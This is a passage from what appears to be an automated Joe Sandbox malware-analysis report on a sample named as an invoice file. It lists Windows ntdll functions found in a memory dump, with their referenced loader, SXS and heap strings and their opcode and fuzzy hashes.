                                                                                                                                        • Opcode Fuzzy Hash: bc5a14386a02a523af7e92742fdff6c37659b58d6af4c8695685f53542952242
                                                                                                                                        • Instruction Fuzzy Hash: 2251D2712083049FD721DF25C881BAB77E8FB98B48F04092AF5C59B2A1D735E904DB93
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01022674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01062178
                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0106219F
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01062180
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01062165
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010621BF
                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01062160, 0106219A, 010621BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                        • Opcode ID: 46506e1d9e510274097b60cca11aa4af4a4859e0f54b46aa466885c1c76730e2
                                                                                                                                        • Instruction ID: 373df6c710e1745debd98b3966262aea229d57c4bc7e5d4e56ddfa1e8baec464
                                                                                                                                        • Opcode Fuzzy Hash: 46506e1d9e510274097b60cca11aa4af4a4859e0f54b46aa466885c1c76730e2
                                                                                                                                        • Instruction Fuzzy Hash: 6B310736F44335B7E721DA998C45F9E7AADEB64B50F09009AFA44BF240E3709A01D6A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 010681E5
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0102C6C3
                                                                                                                                        • LdrpInitializeProcess, xrefs: 0102C6C4
                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01068177, 010681EB
                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01068170
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01068181, 010681F5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                        • Opcode ID: e6caf0d4a5f6663f751447861ba397f258111c2e52c9f51e2e334cf3a1a536d6
                                                                                                                                        • Instruction ID: 803f0c77618a74a1b922508e12f224bb0483a7ffbc6ee022e267884ee3eaad9d
                                                                                                                                        • Opcode Fuzzy Hash: e6caf0d4a5f6663f751447861ba397f258111c2e52c9f51e2e334cf3a1a536d6
                                                                                                                                        • Instruction Fuzzy Hash: B63100717443579BD220EF28D946E5ABBD9AF94B10F040558FAC1AB291E624ED04C7A3
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0103096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 01032DF0: LdrInitializeThunk.NTDLL ref: 01032DFA
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030BA3
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030BB6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030D60
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                        • Opcode ID: feb7dd7b18081cddde149c13136b67d4d2a843a6548895dd7b6539e58aa907ac
                                                                                                                                        • Instruction ID: c9f04da85290cf756a9d0e80518760edfd70271ccc0f89de81f14b566345b9f1
                                                                                                                                        • Opcode Fuzzy Hash: feb7dd7b18081cddde149c13136b67d4d2a843a6548895dd7b6539e58aa907ac
                                                                                                                                        • Instruction Fuzzy Hash: D1426C71A00715DFDB61CF28C880BAAB7F8FF44314F1485AAE989DB645D770AA85CF60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FFA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                        • Opcode ID: 8c3a3a0e40170aab750c356c262edc2211422abe647ee34f25f9c867e4cda87b
                                                                                                                                        • Instruction ID: 2a8ff80a05df4986b6e352ea6ee73d4b1484417fec3c232308dc45606064770a
                                                                                                                                        • Opcode Fuzzy Hash: 8c3a3a0e40170aab750c356c262edc2211422abe647ee34f25f9c867e4cda87b
                                                                                                                                        • Instruction Fuzzy Hash: EBC19CB550838ACFC711DF58C140B7AB7E4BF84704F08486AFA998B2A1E774C945EB63
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01028402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 01028591
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01028421
                                                                                                                                        • LdrpInitializeProcess, xrefs: 01028422
                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0102855E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                        • Opcode ID: 29d9e171ccae37e7af8d9197f76545bd6ab25351bacb44a2bd0ec7315601e3e7
                                                                                                                                        • Instruction ID: 110e85014749019ed660191315c0642a3740bb0cc9d5ff2f4ad2fce804ced605
                                                                                                                                        • Opcode Fuzzy Hash: 29d9e171ccae37e7af8d9197f76545bd6ab25351bacb44a2bd0ec7315601e3e7
                                                                                                                                        • Instruction Fuzzy Hash: 7491B971508356AFE722DE25CC41FABBAECBF88784F40492EFAC486151E735D904CB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 010621DE
                                                                                                                                        • .Local, xrefs: 010228D8
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010622B6
                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010621D9, 010622B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                        • Opcode ID: a54209b412eb353eaf7b45b6e1439a4ae59cdbb22e6ac30874ab9d9ee4f16b52
                                                                                                                                        • Instruction ID: 6f84ea9dcb2031471ccdbdc8fc75c6cd4160b8db58e2bad2dadcb8764491613c
                                                                                                                                        • Opcode Fuzzy Hash: a54209b412eb353eaf7b45b6e1439a4ae59cdbb22e6ac30874ab9d9ee4f16b52
                                                                                                                                        • Instruction Fuzzy Hash: 56A1C231A0122ADFDB25CF98DC84BA9B7B5BF58314F1541EAD988AB351D7709E80CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01024AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RtlDeactivateActivationContext, xrefs: 01063425, 01063432, 01063451
                                                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01063437
                                                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0106342A
                                                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01063456
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                        • API String ID: 0-1245972979
                                                                                                                                        • Opcode ID: f65459e5c9cd71c7766b5b1391be26bfc5b4362772f45d4ca7f6e8efd4cc77b9
                                                                                                                                        • Instruction ID: 233d356356a39444187da59b9ea1f01481794c6cfde138f6d4413208e2e77cf3
                                                                                                                                        • Opcode Fuzzy Hash: f65459e5c9cd71c7766b5b1391be26bfc5b4362772f45d4ca7f6e8efd4cc77b9
                                                                                                                                        • Instruction Fuzzy Hash: F9610336600A269BD762DF1CC841B6AF7E9AF80B10F148569E9D9DF281CB30E801CBD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01051028
                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01050FE5
                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010510AE
                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0105106B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                        • Opcode ID: bb369e45dcb908341b5df5a4337d205319d96a3962ce5469d7e8ae45c2ae259e
                                                                                                                                        • Instruction ID: a677ebc4e5d8cabe24cee1e4cadb4efe5fd9494fbe8fe4c12e7b131d0b77d534
                                                                                                                                        • Opcode Fuzzy Hash: bb369e45dcb908341b5df5a4337d205319d96a3962ce5469d7e8ae45c2ae259e
                                                                                                                                        • Instruction Fuzzy Hash: C171F3B19043099FCB60DF14C884BAB7BE8AF94764F080469FD889B196D774D588DBD2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01024D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0106362F
                                                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0106365C
                                                                                                                                        • LdrpFindDllActivationContext, xrefs: 01063636, 01063662
                                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01063640, 0106366C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                        • API String ID: 0-3779518884
                                                                                                                                        • Opcode ID: 125cf356c2cd880179427b3d6834d897f420333d4e22499c5c4928ef028fc000
                                                                                                                                        • Instruction ID: ea03ae5bbbddbf2a847d5bb33f1f77706b7897fe975d81da744e3b158e53e53e
                                                                                                                                        • Opcode Fuzzy Hash: 125cf356c2cd880179427b3d6834d897f420333d4e22499c5c4928ef028fc000
                                                                                                                                        • Instruction Fuzzy Hash: 9E311E36940631AADF72FB0CCC49F79B6E4BB01B54F0641AAE5C4DB251D7A0DD8087D5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0105A9A2
                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0105A998
                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0105A992
                                                                                                                                        • apphelp.dll, xrefs: 01012462
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                        • Opcode ID: 0e6020f312462ccaa47696fd73a22f070f2a03f43c7dcfa3729c6c6a8f515b36
                                                                                                                                        • Instruction ID: 9576fc743de4fa638a7f13f85fc5aa0f1944cba8dd3d06b37cfc91207ab3819a
                                                                                                                                        • Opcode Fuzzy Hash: 0e6020f312462ccaa47696fd73a22f070f2a03f43c7dcfa3729c6c6a8f515b36
                                                                                                                                        • Instruction Fuzzy Hash: 88316875B00201EBDB719F5A9941EAFBBF4FB84B14F150199E9C0AF249C7799881C780
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • HEAP: , xrefs: 01003264
                                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0100327D
                                                                                                                                        • HEAP[%wZ]: , xrefs: 01003255
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                        • API String ID: 0-617086771
                                                                                                                                        • Opcode ID: f739fd7447f94062ed476f76696a45002f1da12d418c4b590199c10ba107f996
                                                                                                                                        • Instruction ID: 2572527e2f1079ac4b354197177bf0eadb643d4f44691dcbbc1cf106c306c4a2
                                                                                                                                        • Opcode Fuzzy Hash: f739fd7447f94062ed476f76696a45002f1da12d418c4b590199c10ba107f996
                                                                                                                                        • Instruction Fuzzy Hash: 0792CF70A04649DFEB26CF68C4447AEBBF1FF48304F1880A9E999AB391D735A945CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01000770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                        • Opcode ID: c586f2bbc52aacd4bf8706b06d1d361d2161185855934dddc8b61c6179c94c41
                                                                                                                                        • Instruction ID: ff4d44ca0e8a5f2560cd7b67147a2d7731de3a1bd545b8bf42c66f8e3ee347f1
                                                                                                                                        • Opcode Fuzzy Hash: c586f2bbc52aacd4bf8706b06d1d361d2161185855934dddc8b61c6179c94c41
                                                                                                                                        • Instruction Fuzzy Hash: 15F1BF30600606DFEB56CF68C894BAEBBF5FF45340F1481A8E9969B385D734E981CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01016962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $@
                                                                                                                                        • API String ID: 0-1077428164
                                                                                                                                        • Opcode ID: 77dbeb7fdfd717a28d88c941daefc1ba2cd4188dce75272736501e7c82d6bfd6
                                                                                                                                        • Instruction ID: 4cb7340015a22da5762e1ddcff778e02b81409f7954cdc1abbd3dab2fb78ad6c
                                                                                                                                        • Opcode Fuzzy Hash: 77dbeb7fdfd717a28d88c941daefc1ba2cd4188dce75272736501e7c82d6bfd6
                                                                                                                                        • Instruction Fuzzy Hash: 2EC29B716083419FEB65CF28C880BABBBE5BF88704F04896DF9C987245D779D845CB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                        • Opcode ID: 0f76f7b895936890af23d30ae7fc353854ea469a39eb5b1bb437087feb5d133a
                                                                                                                                        • Instruction ID: eb9a314986107daca4e0ce298f173c3db0dd149008a1061023142f1a5fae11fc
                                                                                                                                        • Opcode Fuzzy Hash: 0f76f7b895936890af23d30ae7fc353854ea469a39eb5b1bb437087feb5d133a
                                                                                                                                        • Instruction Fuzzy Hash: 9BA18E719012299BEB31DF24CD88BEAB7B8FF44710F1041EAEA49A7250D735AE85CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01010BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0105A121
                                                                                                                                        • LdrpCheckModule, xrefs: 0105A117
                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0105A10F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                        • Opcode ID: 82f7aec9e654a1fe854e0c3bb84cbdc0b85c582c1f795bd886f7a608e34e770d
                                                                                                                                        • Instruction ID: 2999b33b7faae6e57fe278e77fe92f11cf2f46891b66247a8c7797788d902f66
                                                                                                                                        • Opcode Fuzzy Hash: 82f7aec9e654a1fe854e0c3bb84cbdc0b85c582c1f795bd886f7a608e34e770d
                                                                                                                                        • Instruction Fuzzy Hash: 9A71F070B00209DFDB65DF69C981AAEB7F4FB44704F0441ADE9C2DB259E739A981CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01000A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                        • Opcode ID: 7f3d595264ba83edd37fd01c7adca618c6ee806eaa6298ada9488151f4fcc77f
                                                                                                                                        • Instruction ID: 9a3ae83bdaa8b46623eed3b3d0bc3e47f041efc7c773740f307727e8a7250661
                                                                                                                                        • Opcode Fuzzy Hash: 7f3d595264ba83edd37fd01c7adca618c6ee806eaa6298ada9488151f4fcc77f
                                                                                                                                        • Instruction Fuzzy Hash: 1F61C270600701DFEB6ACF28C840BAABBE1FF45744F148599E8998F296D774E881CB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FECCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 00FECD63
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FECD34
                                                                                                                                        • InstallLanguageFallback, xrefs: 00FECD7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                        • API String ID: 0-1757540487
                                                                                                                                        • Opcode ID: 9a2e6678ee889d9a82fad3d77b674bd1b279cc28f30f6ad23c1ae53b20c84d83
                                                                                                                                        • Instruction ID: fff9f698fd5d16f4474a0c8b0bc1413dfb8d068ebf463ab091d2954f016be3f5
                                                                                                                                        • Opcode Fuzzy Hash: 9a2e6678ee889d9a82fad3d77b674bd1b279cc28f30f6ad23c1ae53b20c84d83
                                                                                                                                        • Instruction Fuzzy Hash: 9851BFB66043569BC721DF25C884BAAB7E8AFC8714F00097EB9C5D7250EB34D90587A2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 010682E8
                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 010682D7
                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 010682DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                        • Opcode ID: 3d265454dddb84aba7d63700bb4e2d21e4b7153a2f8d315cbfb09ebdbd6e529e
                                                                                                                                        • Instruction ID: 036798c8fa0fb36c69e305acf07bf49c75ff78ef099a4c7a86fd6108928269e4
                                                                                                                                        • Opcode Fuzzy Hash: 3d265454dddb84aba7d63700bb4e2d21e4b7153a2f8d315cbfb09ebdbd6e529e
                                                                                                                                        • Instruction Fuzzy Hash: 4A4141B1554311ABE771EB29DD44B9F77E8BF48B10F00492AFAC4CB290E779D8008B91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

